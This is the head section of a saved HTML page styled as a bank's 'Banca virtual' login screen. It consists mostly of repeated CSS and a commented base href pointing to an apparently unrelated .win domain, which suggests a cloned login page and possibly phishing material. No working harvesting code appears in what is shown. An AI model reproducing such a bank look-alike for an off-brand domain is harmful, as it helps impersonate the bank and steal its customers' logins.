<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title>Virtual | Banca virtual</title>
    <!-- base href="https://www2.lineapersonal.win/virtual/login/" -->
 

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="theme-color" content="#ed0722">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>


    <!-- Fingerprint -->
    
    <!-- End Fingerprint -->

    <!-- Biocatch -->
    
    <!--End Biocatch -->
  <noscript></noscript><meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9"><meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9"><style>body{font-size:100%;}</style><style>/*! CSS Used from: Embedded */
html,body,div,img{margin:0;padding:0;border:0;font-family:inherit;vertical-align:baseline;}
html{box-sizing:border-box;z-index:1;}
html,body{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;}
*,*:before,*:after{box-sizing:inherit;}
html,body{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:10px;font-weight:initial;letter-spacing:0;line-height:18px;margin:0;color:#333;}
.svg-icon{display:inline-block;fill:currentColor;stroke:currentColor;stroke-linecap:round;stroke-linejoin:round;}
html,body{min-height:100vh;font-size:65.2%;}
body{font-size:1.6rem;}
/*! CSS Used from: /virtual/login/styles.fab891c56ab0f9fc.css ; media=all */
@media all{
html,body,div,span,h1,p,a,img,form,label,footer,header,section{margin:0;padding:0;border:0;font-family:inherit;vertical-align:baseline;}
html{box-sizing:border-box;z-index:1;}
html,body{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;}
*,*:before,*:after{box-sizing:inherit;}
input[type=text]{-webkit-appearance:none;appearance:none;}
.brand{color:#333;text-decoration:none;}
.container{max-width:1440px;min-width:248px;position:relative;width:auto;}
@media (min-width: 0){
.container{margin:0 3rem;}
}
@media (min-width: 768px){
.container{margin:0 2.4rem;}
}
@media (min-width: 922px){
.container{margin:0 2.1rem;}
}
@media (min-width: 1200px){
.container{margin:0 1.8rem;}
}
@media (min-width: 1488px){
.container.container--center{margin:0 auto;}
}
.direction--row{display:flex;flex-basis:auto;flex-grow:1;flex-shrink:1;flex-direction:row;flex-wrap:wrap;position:relative;}
@media (min-width: 0){
.col-xs-12{flex:0 0 100%;max-width:100%;padding:0 .6rem;}
}
@media (min-width: 768px){
.col-sm-6{flex:0 0 50%;max-width:50%;padding:0 1.2rem;}
.col-sm-12{flex:0 0 100%;max-width:100%;padding:0 1.2rem;}
.offset-sm-3{margin-left:25%;}
}
@media (min-width: 922px){
.col-md-1{flex:0 0 8.3333333333%;max-width:8.3333333333%;padding:0 1.5rem;}
.col-md-2{flex:0 0 16.6666666667%;max-width:16.6666666667%;padding:0 1.5rem;}
.col-md-4{flex:0 0 33.3333333333%;max-width:33.3333333333%;padding:0 1.5rem;}
.col-md-12{flex:0 0 100%;max-width:100%;padding:0 1.5rem;}
.offset-md-0{margin-left:0%;}
}
@media (min-width: 1200px){
.col-lg-12{flex:0 0 100%;max-width:100%;padding:0 1.8rem;}
}
@media (min-width: 0) and (max-width: 767px){
.hide--xs{display:none;}
}
@media (min-width: 768px) and (max-width: 921px){
.hide--sm{display:none;}
}
@media (min-width: 922px) and (max-width: 1199px){
.hide--md{display:none;}
}
@media (min-width: 1200px) and (max-width: 4000px){
.hide--lg{display:none;}
}
html,body{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:10px;font-weight:initial;letter-spacing:0;line-height:18px;margin:0;color:#333;}
.hero{font-family:Scotia Headline,Arial,Helvetica,"sans-serif";font-size:3.6rem;font-weight:400;letter-spacing:0;line-height:4.1rem;margin:0;}
@media (min-width: 922px){
.hero{font-size:4.8rem;line-height:5.4rem;}
}
.text--footer{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.2rem;font-weight:400;letter-spacing:0;line-height:1.8rem;margin:0;}
.color--default{color:#333;}
.background--background-alternate{background-color:#fafbfd;}
.block{display:flex;flex-direction:row;}
.block--centered{align-items:center;justify-content:center;}
@media (min-width: 0){
.margin-xs-12{margin-bottom:1.2rem;margin-top:1.2rem;}
.margin-xs-24--top{margin-top:2.4rem;}
.margin-xs-30--top{margin-top:3rem;}
.margin-xs-36--top{margin-top:3.6rem;}
.margin-xs-72--bottom{margin-bottom:7.2rem;}
}
@media (min-width: 768px){
.margin-sm-18{margin-bottom:1.8rem;margin-top:1.8rem;}
}
.svg-icon{display:inline-block;fill:currentColor;stroke:currentColor;stroke-linecap:round;stroke-linejoin:round;}
.svg-icon--size-18px{height:1.8rem;stroke-width:2;width:1.8rem;}
.button{background-color:transparent;border:0;border-radius:0;cursor:pointer;outline:none;overflow:visible;position:relative;-webkit-user-select:none;}
.button:disabled{cursor:not-allowed;-webkit-tap-highlight-color:transparent;}
@media all and (-ms-high-contrast: active){
.button:focus{outline:2px solid white;}
}
@media all and (-ms-high-contrast: black-on-white){
.button:focus{outline:2px solid black;}
}
.button--primary{font-family:Scotia Bold;font-size:1.6rem;font-weight:initial;letter-spacing:0rem;line-height:1.6rem;border:.1rem solid;border-radius:.8rem;padding:0 3.6rem;text-decoration:none;background-color:#ec111a;border-color:#ec111a;color:#fff;min-height:5.4rem;min-width:11.8rem;transition:background-color ease-in .1s,color ease-in .1s;}
.button--primary:disabled:disabled,.button--primary:hover:disabled{background-color:#f6f6f6;border-color:#d6d6d6;color:#757575;}
.button--primary:hover,.button--primary:focus{background-color:#be061b;border-color:#be061b;color:#fff;transition:background-color ease-out .1s,color ease-out .1s;}
.button--primary:after{border-radius:.8rem;box-shadow:0 0 0 .1rem #fff,0 0 0 .2rem #788591,0 0 0 .5rem #e3e7e8;content:" ";display:inline-block;height:calc(100% + .2rem);left:-.1rem;opacity:0;position:absolute;top:-.1rem;transition:opacity ease-in-out .2s;width:calc(100% + .2rem);}
.button--primary:focus{outline:transparent;}
.button--primary:focus:after{opacity:1;}
.button:disabled:hover{box-shadow:none;}
.header{border-top:solid 4px #ec111a;}
.header__bar{justify-content:space-between;padding:3.6rem 1.2rem;}
.form__input{border:0;position:relative;}
.form__input--inline{cursor:pointer;position:relative;}
.label{font-family:Scotia Bold,Arial,Helvetica,"sans-serif";font-size:1.6rem;font-weight:initial;line-height:2.4rem;color:#333;display:inline;padding:0 .1rem;vertical-align:middle;}
.input{padding:1rem .1rem;width:100%;font-family:Scotia Regular;font-size:2rem;font-weight:initial;line-height:2.4rem;}
.input--with-icon{top:initial;}
.input--with-icon--left{padding-left:3.2rem;}
.input__icon{pointer-events:none;position:absolute;top:50%;transform:translateY(-50%);}
.input__icon--left{left:0;}
.input--text{-webkit-appearance:none;appearance:none;background-color:transparent;border-bottom-color:#757575;border-bottom-style:solid;border-radius:0;border-width:0 0 1px;color:#333;display:block;outline:none;position:relative;transition:box-shadow .2s ease-in-out;width:100%;}
.input--text:focus{border-bottom-color:#009dd6;box-shadow:0 .1rem #009dd6;}
.input-w-aux__input{padding-left:2.5rem;}
.input-w-aux__action{bottom:1.1rem;color:#333;height:2rem;opacity:0;padding:0;position:absolute;right:1.8rem;transition:opacity .1s ease-in-out;width:2rem;z-index:110;}
@media (min-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:2rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;}
}
@media (max-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.8rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}
}
html,body{min-height:100vh;font-size:65.2%;}
body{font-size:1.6rem;}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{margin:0 36px;max-width:initial;}
}
.block--padding-0{padding:0;}
.hero{font-size:2.6rem;}
@media (min-width: 922px){
.hero{font-size:3.6rem;}
}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{max-width:1200px;}
.container--center{margin:0 auto;}
}
::-webkit-scrollbar{width:.25rem;}
::-webkit-scrollbar-track{box-shadow:inset 0 0 .02rem #757575;border-radius:2rem;}
::-webkit-scrollbar-thumb{background:#757575;border-radius:2rem;}
::-webkit-scrollbar-thumb:hover{background:#e2e8ee;}
}
/*! CSS Used from: Embedded */
html,body,div,span,h1,p,a,img,form,label,footer,header,section{margin:0;padding:0;border:0;font-family:inherit;vertical-align:baseline;}
html{box-sizing:border-box;z-index:1;}
html,body{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;}
*,*:before,*:after{box-sizing:inherit;}
input[type=text]{-webkit-appearance:none;appearance:none;}
.brand{color:#333;text-decoration:none;}
.container{max-width:1440px;min-width:248px;position:relative;width:auto;}
@media (min-width: 0){
.container{margin:0 3rem;}
}
@media (min-width: 768px){
.container{margin:0 2.4rem;}
}
@media (min-width: 922px){
.container{margin:0 2.1rem;}
}
@media (min-width: 1200px){
.container{margin:0 1.8rem;}
}
@media (min-width: 1488px){
.container.container--center{margin:0 auto;}
}
.direction--row{display:flex;flex-basis:auto;flex-grow:1;flex-shrink:1;flex-direction:row;flex-wrap:wrap;position:relative;}
@media (min-width: 0){
.col-xs-12{flex:0 0 100%;max-width:100%;padding:0 .6rem;}
}
@media (min-width: 768px){
.col-sm-6{flex:0 0 50%;max-width:50%;padding:0 1.2rem;}
.col-sm-12{flex:0 0 100%;max-width:100%;padding:0 1.2rem;}
.offset-sm-3{margin-left:25%;}
}
@media (min-width: 922px){
.col-md-1{flex:0 0 8.3333333333%;max-width:8.3333333333%;padding:0 1.5rem;}
.col-md-2{flex:0 0 16.6666666667%;max-width:16.6666666667%;padding:0 1.5rem;}
.col-md-4{flex:0 0 33.3333333333%;max-width:33.3333333333%;padding:0 1.5rem;}
.col-md-12{flex:0 0 100%;max-width:100%;padding:0 1.5rem;}
.offset-md-0{margin-left:0%;}
}
@media (min-width: 1200px){
.col-lg-12{flex:0 0 100%;max-width:100%;padding:0 1.8rem;}
}
@media (min-width: 0) and (max-width: 767px){
.hide--xs{display:none;}
}
@media (min-width: 768px) and (max-width: 921px){
.hide--sm{display:none;}
}
@media (min-width: 922px) and (max-width: 1199px){
.hide--md{display:none;}
}
@media (min-width: 1200px) and (max-width: 4000px){
.hide--lg{display:none;}
}
html,body{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:10px;font-weight:initial;letter-spacing:0;line-height:18px;margin:0;color:#333;}
.hero{font-family:Scotia Headline,Arial,Helvetica,"sans-serif";font-size:3.6rem;font-weight:400;letter-spacing:0;line-height:4.1rem;margin:0;}
@media (min-width: 922px){
.hero{font-size:4.8rem;line-height:5.4rem;}
}
.text--footer{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.2rem;font-weight:400;letter-spacing:0;line-height:1.8rem;margin:0;}
.color--default{color:#333;}
.background--background-alternate{background-color:#fafbfd;}
.block{display:flex;flex-direction:row;}
.block--centered{align-items:center;justify-content:center;}
@media (min-width: 0){
.margin-xs-12{margin-bottom:1.2rem;margin-top:1.2rem;}
.margin-xs-24--top{margin-top:2.4rem;}
.margin-xs-30--top{margin-top:3rem;}
.margin-xs-36--top{margin-top:3.6rem;}
.margin-xs-72--bottom{margin-bottom:7.2rem;}
}
@media (min-width: 768px){
.margin-sm-18{margin-bottom:1.8rem;margin-top:1.8rem;}
}
.svg-icon{display:inline-block;fill:currentColor;stroke:currentColor;stroke-linecap:round;stroke-linejoin:round;}
.svg-icon--size-18px{height:1.8rem;stroke-width:2;width:1.8rem;}
.button{background-color:transparent;border:0;border-radius:0;cursor:pointer;outline:none;overflow:visible;position:relative;-webkit-user-select:none;}
.button:disabled{cursor:not-allowed;-webkit-tap-highlight-color:transparent;}
@media all and (-ms-high-contrast: active){
.button:focus{outline:2px solid white;}
}
@media all and (-ms-high-contrast: black-on-white){
.button:focus{outline:2px solid black;}
}
.button--primary{font-family:Scotia Bold;font-size:1.6rem;font-weight:initial;letter-spacing:0rem;line-height:1.6rem;border:.1rem solid;border-radius:.8rem;padding:0 3.6rem;text-decoration:none;background-color:#ec111a;border-color:#ec111a;color:#fff;min-height:5.4rem;min-width:11.8rem;transition:background-color ease-in .1s,color ease-in .1s;}
.button--primary:disabled:disabled,.button--primary:hover:disabled{background-color:#f6f6f6;border-color:#d6d6d6;color:#757575;}
.button--primary:hover,.button--primary:focus{background-color:#be061b;border-color:#be061b;color:#fff;transition:background-color ease-out .1s,color ease-out .1s;}
.button--primary:after{border-radius:.8rem;box-shadow:0 0 0 .1rem #fff,0 0 0 .2rem #788591,0 0 0 .5rem #e3e7e8;content:" ";display:inline-block;height:calc(100% + .2rem);left:-.1rem;opacity:0;position:absolute;top:-.1rem;transition:opacity ease-in-out .2s;width:calc(100% + .2rem);}
.button--primary:focus{outline:transparent;}
.button--primary:focus:after{opacity:1;}
.button:disabled:hover{box-shadow:none;}
.header{border-top:solid 4px #ec111a;}
.header__bar{justify-content:space-between;padding:3.6rem 1.2rem;}
.form__input{border:0;position:relative;}
.form__input--inline{cursor:pointer;position:relative;}
.label{font-family:Scotia Bold,Arial,Helvetica,"sans-serif";font-size:1.6rem;font-weight:initial;line-height:2.4rem;color:#333;display:inline;padding:0 .1rem;vertical-align:middle;}
.input{padding:1rem .1rem;width:100%;font-family:Scotia Regular;font-size:2rem;font-weight:initial;line-height:2.4rem;}
.input--with-icon{top:initial;}
.input--with-icon--left{padding-left:3.2rem;}
.input__icon{pointer-events:none;position:absolute;top:50%;transform:translateY(-50%);}
.input__icon--left{left:0;}
.input--text{-webkit-appearance:none;appearance:none;background-color:transparent;border-bottom-color:#757575;border-bottom-style:solid;border-radius:0;border-width:0 0 1px;color:#333;display:block;outline:none;position:relative;transition:box-shadow .2s ease-in-out;width:100%;}
.input--text:focus{border-bottom-color:#009dd6;box-shadow:0 .1rem #009dd6;}
.input-w-aux__input{padding-left:2.5rem;}
.input-w-aux__action{bottom:1.1rem;color:#333;height:2rem;opacity:0;padding:0;position:absolute;right:1.8rem;transition:opacity .1s ease-in-out;width:2rem;z-index:110;}
@media (min-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:2rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;}
}
@media (max-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.8rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}
}
html,body{min-height:100vh;font-size:65.2%;}
body{font-size:1.6rem;}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{margin:0 36px;max-width:initial;}
}
.block--padding-0{padding:0;}
.hero{font-size:2.6rem;}
@media (min-width: 922px){
.hero{font-size:3.6rem;}
}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{max-width:1200px;}
.container--center{margin:0 auto;}
}
::-webkit-scrollbar{width:.25rem;}
::-webkit-scrollbar-track{box-shadow:inset 0 0 .02rem #757575;border-radius:2rem;}
::-webkit-scrollbar-thumb{background:#757575;border-radius:2rem;}
::-webkit-scrollbar-thumb:hover{background:#e2e8ee;}
.application-wrapper{height:100vh;width:100%;display:flex;flex-direction:column;}
.application-wrapper .header{max-height:6rem;}
.application-wrapper .header__bar.container--center{padding:1rem 3rem;}
@media (min-width: 0){
.application-wrapper .header__bar.container--center{margin:0 auto;}
}
.application-wrapper .header .logo{width:350px;}
@media (max-width: 599px){
.application-wrapper .header .logo{display:none;}
}
.application-wrapper .header .logo__mobile{width:90px;}
@media (min-width: 600px){
.application-wrapper .header .logo__mobile{display:none;}
}
.application-wrapper .main-container{margin:9rem auto 0!important;min-height:65rem;padding:0 3.6rem;flex:80%;width:100%;}
@media (min-width: 922px){
.application-wrapper .main-container{padding:0!important;max-width:1200px;margin:13.2rem auto 0!important;}
}
.application-wrapper .header__block{flex:0;}
/*! CSS Used from: Embedded */
canvas-header .header__bar{padding:.8rem 1.2rem;}
canvas-header[fixed] .header{position:fixed;top:0;left:0;width:100%;z-index:300;}
canvas-header[fixed] .header:not([class*=background]){background-color:#fff;}
canvas-header[shadow] .header{box-shadow:0 .2rem 1rem #0028501c;}
/*! CSS Used from: Embedded */
.footer-simple--co{height:100%;width:100%;max-height:8rem;text-align:center;}
@media (min-width: 922px){
.footer-simple--co{text-align:right;}
}
.footer-simple--co .text--footer{display:flex;flex-flow:column nowrap;font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.2rem;font-weight:400;letter-spacing:0;line-height:1.8rem;margin:0;}
@media (min-width: 922px){
.footer-simple--co .text--footer{flex-direction:row;justify-content:flex-end;line-height:2.4rem;}
}
/*! CSS Used from: Embedded */
html,body,div,span,h1,p,a,img,form,label,footer,header,section{margin:0;padding:0;border:0;font-family:inherit;vertical-align:baseline;}
html{box-sizing:border-box;z-index:1;}
html,body{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;}
*,*:before,*:after{box-sizing:inherit;}
input[type=text]{-webkit-appearance:none;appearance:none;}
.brand{color:#333;text-decoration:none;}
.container{max-width:1440px;min-width:248px;position:relative;width:auto;}
@media (min-width: 0){
.container{margin:0 3rem;}
}
@media (min-width: 768px){
.container{margin:0 2.4rem;}
}
@media (min-width: 922px){
.container{margin:0 2.1rem;}
}
@media (min-width: 1200px){
.container{margin:0 1.8rem;}
}
@media (min-width: 1488px){
.container.container--center{margin:0 auto;}
}
.direction--row{display:flex;flex-basis:auto;flex-grow:1;flex-shrink:1;flex-direction:row;flex-wrap:wrap;position:relative;}
@media (min-width: 0){
.col-xs-12{flex:0 0 100%;max-width:100%;padding:0 .6rem;}
}
@media (min-width: 768px){
.col-sm-6{flex:0 0 50%;max-width:50%;padding:0 1.2rem;}
.col-sm-12{flex:0 0 100%;max-width:100%;padding:0 1.2rem;}
.offset-sm-3{margin-left:25%;}
}
@media (min-width: 922px){
.col-md-1{flex:0 0 8.3333333333%;max-width:8.3333333333%;padding:0 1.5rem;}
.col-md-2{flex:0 0 16.6666666667%;max-width:16.6666666667%;padding:0 1.5rem;}
.col-md-4{flex:0 0 33.3333333333%;max-width:33.3333333333%;padding:0 1.5rem;}
.col-md-12{flex:0 0 100%;max-width:100%;padding:0 1.5rem;}
.offset-md-0{margin-left:0%;}
}
@media (min-width: 1200px){
.col-lg-12{flex:0 0 100%;max-width:100%;padding:0 1.8rem;}
}
@media (min-width: 0) and (max-width: 767px){
.hide--xs{display:none;}
}
@media (min-width: 768px) and (max-width: 921px){
.hide--sm{display:none;}
}
@media (min-width: 922px) and (max-width: 1199px){
.hide--md{display:none;}
}
@media (min-width: 1200px) and (max-width: 4000px){
.hide--lg{display:none;}
}
html,body{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:10px;font-weight:initial;letter-spacing:0;line-height:18px;margin:0;color:#333;}
.hero{font-family:Scotia Headline,Arial,Helvetica,"sans-serif";font-size:3.6rem;font-weight:400;letter-spacing:0;line-height:4.1rem;margin:0;}
@media (min-width: 922px){
.hero{font-size:4.8rem;line-height:5.4rem;}
}
.text--footer{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.2rem;font-weight:400;letter-spacing:0;line-height:1.8rem;margin:0;}
.color--default{color:#333;}
.background--background-alternate{background-color:#fafbfd;}
.block{display:flex;flex-direction:row;}
.block--centered{align-items:center;justify-content:center;}
@media (min-width: 0){
.margin-xs-12{margin-bottom:1.2rem;margin-top:1.2rem;}
.margin-xs-24--top{margin-top:2.4rem;}
.margin-xs-30--top{margin-top:3rem;}
.margin-xs-36--top{margin-top:3.6rem;}
.margin-xs-72--bottom{margin-bottom:7.2rem;}
}
@media (min-width: 768px){
.margin-sm-18{margin-bottom:1.8rem;margin-top:1.8rem;}
}
.svg-icon{display:inline-block;fill:currentColor;stroke:currentColor;stroke-linecap:round;stroke-linejoin:round;}
.svg-icon--size-18px{height:1.8rem;stroke-width:2;width:1.8rem;}
.button{background-color:transparent;border:0;border-radius:0;cursor:pointer;outline:none;overflow:visible;position:relative;-webkit-user-select:none;}
.button:disabled{cursor:not-allowed;-webkit-tap-highlight-color:transparent;}
@media all and (-ms-high-contrast: active){
.button:focus{outline:2px solid white;}
}
@media all and (-ms-high-contrast: black-on-white){
.button:focus{outline:2px solid black;}
}
.button--primary{font-family:Scotia Bold;font-size:1.6rem;font-weight:initial;letter-spacing:0rem;line-height:1.6rem;border:.1rem solid;border-radius:.8rem;padding:0 3.6rem;text-decoration:none;background-color:#ec111a;border-color:#ec111a;color:#fff;min-height:5.4rem;min-width:11.8rem;transition:background-color ease-in .1s,color ease-in .1s;}
.button--primary:disabled:disabled,.button--primary:hover:disabled{background-color:#f6f6f6;border-color:#d6d6d6;color:#757575;}
.button--primary:hover,.button--primary:focus{background-color:#be061b;border-color:#be061b;color:#fff;transition:background-color ease-out .1s,color ease-out .1s;}
.button--primary:after{border-radius:.8rem;box-shadow:0 0 0 .1rem #fff,0 0 0 .2rem #788591,0 0 0 .5rem #e3e7e8;content:" ";display:inline-block;height:calc(100% + .2rem);left:-.1rem;opacity:0;position:absolute;top:-.1rem;transition:opacity ease-in-out .2s;width:calc(100% + .2rem);}
.button--primary:focus{outline:transparent;}
.button--primary:focus:after{opacity:1;}
.button:disabled:hover{box-shadow:none;}
.header{border-top:solid 4px #ec111a;}
.header__bar{justify-content:space-between;padding:3.6rem 1.2rem;}
.form__input{border:0;position:relative;}
.form__input--inline{cursor:pointer;position:relative;}
.label{font-family:Scotia Bold,Arial,Helvetica,"sans-serif";font-size:1.6rem;font-weight:initial;line-height:2.4rem;color:#333;display:inline;padding:0 .1rem;vertical-align:middle;}
.input{padding:1rem .1rem;width:100%;font-family:Scotia Regular;font-size:2rem;font-weight:initial;line-height:2.4rem;}
.input--with-icon{top:initial;}
.input--with-icon--left{padding-left:3.2rem;}
.input__icon{pointer-events:none;position:absolute;top:50%;transform:translateY(-50%);}
.input__icon--left{left:0;}
.input--text{-webkit-appearance:none;appearance:none;background-color:transparent;border-bottom-color:#757575;border-bottom-style:solid;border-radius:0;border-width:0 0 1px;color:#333;display:block;outline:none;position:relative;transition:box-shadow .2s ease-in-out;width:100%;}
.input--text:focus{border-bottom-color:#009dd6;box-shadow:0 .1rem #009dd6;}
.input-w-aux__input{padding-left:2.5rem;}
.input-w-aux__action{bottom:1.1rem;color:#333;height:2rem;opacity:0;padding:0;position:absolute;right:1.8rem;transition:opacity .1s ease-in-out;width:2rem;z-index:110;}
@media (min-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:2rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;}
}
@media (max-width: 767px){
.input-w-aux__input{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.8rem;font-weight:400;letter-spacing:0;line-height:2.8rem;margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}
}
html,body{min-height:100vh;font-size:65.2%;}
body{font-size:1.6rem;}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{margin:0 36px;max-width:initial;}
}
.block--padding-0{padding:0;}
.hero{font-size:2.6rem;}
@media (min-width: 922px){
.hero{font-size:3.6rem;}
}
@media only screen and (min-width: 768px),(min-width: 1200px){
.container{max-width:1200px;}
.container--center{margin:0 auto;}
}
::-webkit-scrollbar{width:.25rem;}
::-webkit-scrollbar-track{box-shadow:inset 0 0 .02rem #757575;border-radius:2rem;}
::-webkit-scrollbar-thumb{background:#757575;border-radius:2rem;}
::-webkit-scrollbar-thumb:hover{background:#e2e8ee;}
.line-vertical{display:flex;justify-content:center;}
.line-vertical .line-border{border-left:.1rem solid #e2e8ee;height:100%;}
section{padding-top:0;}
section{display:flex;flex-direction:row;flex:1;}
.form__password{position:relative;}
.password-validation{text-align:left;display:none;justify-content:space-between;width:100%;margin-top:.6rem;}
.password-validation span{font-size:.75em;color:#333;}
auth-login{width:100%;}
/*! CSS Used from: Embedded */
html,body,div,span,h1,p,a,img,form,label,footer,header,section{margin:0;padding:0;border:0;font-family:inherit;vertical-align:baseline;}
html{box-sizing:border-box;z-index:1;}
html,body{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;}
*,*:before,*:after{box-sizing:inherit;}
input[type=text]{-webkit-appearance:none;appearance:none;}
.brand{color:#333;text-decoration:none;}
.container{max-width:1440px;min-width:248px;position:relative;width:auto;}
@media (min-width: 0){
.container{margin:0 3rem;}
}
@media (min-width: 768px){
.container{margin:0 2.4rem;}
}
@media (min-width: 922px){
.container{margin:0 2.1rem;}
}
@media (min-width: 1200px){
.container{margin:0 1.8rem;}
}
@media (min-width: 1488px){
.container.container--center{margin:0 auto;}
}
.direction--row{display:flex;flex-basis:auto;flex-grow:1;flex-shrink:1;flex-direction:row;flex-wrap:wrap;position:relative;}
@media (min-width: 0){
.col-xs-12{flex:0 0 100%;max-width:100%;padding:0 .6rem;}
}
@media (min-width: 768px){
.col-sm-6{flex:0 0 50%;max-width:50%;padding:0 1.2rem;}
.col-sm-12{flex:0 0 100%;max-width:100%;padding:0 1.2rem;}
.offset-sm-3{margin-left:25%;}
}
@media (min-width: 922px){
.col-md-1{flex:0 0 8.3333333333%;max-width:8.3333333333%;padding:0 1.5rem;}
.col-md-2{flex:0 0 16.6666666667%;max-width:16.6666666667%;padding:0 1.5rem;}
.col-md-4{flex:0 0 33.3333333333%;max-width:33.3333333333%;padding:0 1.5rem;}
.col-md-12{flex:0 0 100%;max-width:100%;padding:0 1.5rem;}
.offset-md-0{margin-left:0%;}
}
@media (min-width: 1200px){
.col-lg-12{flex:0 0 100%;max-width:100%;padding:0 1.8rem;}
}
@media (min-width: 0) and (max-width: 767px){
.hide--xs{display:none;}
}
@media (min-width: 768px) and (max-width: 921px){
.hide--sm{display:none;}
}
@media (min-width: 922px) and (max-width: 1199px){
.hide--md{display:none;}
}
@media (min-width: 1200px) and (max-width: 4000px){
.hide--lg{display:none;}
}
html,body{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:10px;font-weight:initial;letter-spacing:0;line-height:18px;margin:0;color:#333;}
.hero{font-family:Scotia Headline,Arial,Helvetica,"sans-serif";font-size:3.6rem;font-weight:400;letter-spacing:0;line-height:4.1rem;margin:0;}
@media (min-width: 922px){
.hero{font-size:4.8rem;line-height:5.4rem;}
}
.text--footer{font-family:Scotia Regular,Arial,Helvetica,"sans-serif";font-size:1.2rem;font-weight:400;letter-spacing:0;line-height:1.8rem;margin:0;}
.color--default{color:#333;}
.background--background-alternate{background-color:#fafbfd;}
.block{display:flex;flex-direction:row;}
.block--centered{align-items:center;justify-content:center;}
@media (min-width: 0){
.margin-xs-12{margin-bottom:1.2rem;margin-top:1.2rem;}
.margin-xs-24--top{margin-top:2.4rem;}
.margin-xs-30--top{margin-top:3rem;}
.margin-xs-36--top{margin-top:3.6rem;}
.margin-xs-72--bottom{margin-bottom:7.2rem;}
}
@media (min-width: 768px){
.margin-sm-18{margin-bottom:1.8rem;margin-top:1.8rem;}
}
.svg-icon{display:inline-block;fill:currentColor;stroke:currentColor;stroke-linecap:round;stroke-linejoin:round;}
.svg-icon--size-18px{height:1.8rem;stroke-width:2;width:1.8rem;}
.button{background-color:transparent;border:0;border-radius:0;cursor:pointer;outline:none;overflow:visible;position:relative;-webkit-user-select:none;}
.button:disabled{cursor:not-allowed;-webkit-tap-highlight-color:transparent;}
@media all and (-ms-high-contrast: active){
.button:focus{outline:2px solid white;}
}
@media all and (-ms-high-contrast: black-on-white){
.button:focus{outline:2px solid black;}
}
.button--primary{font-family:Scotia Bold;font-size:1.6rem;font-weight:initial;letter-spacing:0rem;line-height:1.6rem;border:.1rem solid;border-radius:.8rem;padding:0 3.6rem;text-decoration:none;background-color:#ec111a;border-color:#ec111a;color:#fff;min-height:5.4rem;min-width:11.8rem;transition:background-color ease-in .1s,color ease-in .1s;}
.button--primary:disabled:disabled,.button--primary:hover:disabled{background-color:#f6f6f6;border-color:#d6d6d6;color:#757575;}
.button--primary:hover,.button--primary:focus{background-color:#be061b;border-color:#be061b;color:#fff;transition:background-color ease-out .1s,color ease-out .1s;}
.button--primary:after{border-radius:.8rem;box-shadow:0 0 0 .1rem #fff,0 0 0 .2rem #788591,0 0 0 .5rem #e3e7e8;content:" ";display:inline-block;height:calc(100% + .2rem);left:-.1rem;opacity:0;position:absolute;top:-.1rem;transition:opacity ease-in-out .2s;width:calc(100% + .2rem);}
.button--primary:focus{outline:transparent;}
.button--primary:focus:after{opacity:1;}
.button:disabled:hover{box-shadow:none;}
.header{border-top:solid 4px #ec111a;}
.header__bar{justify-content:space-between;padding:3.6rem 1.2rem;}
.form__input{border:0;position:relative;}
.form__input--inline{cursor:pointer;position:relative;}
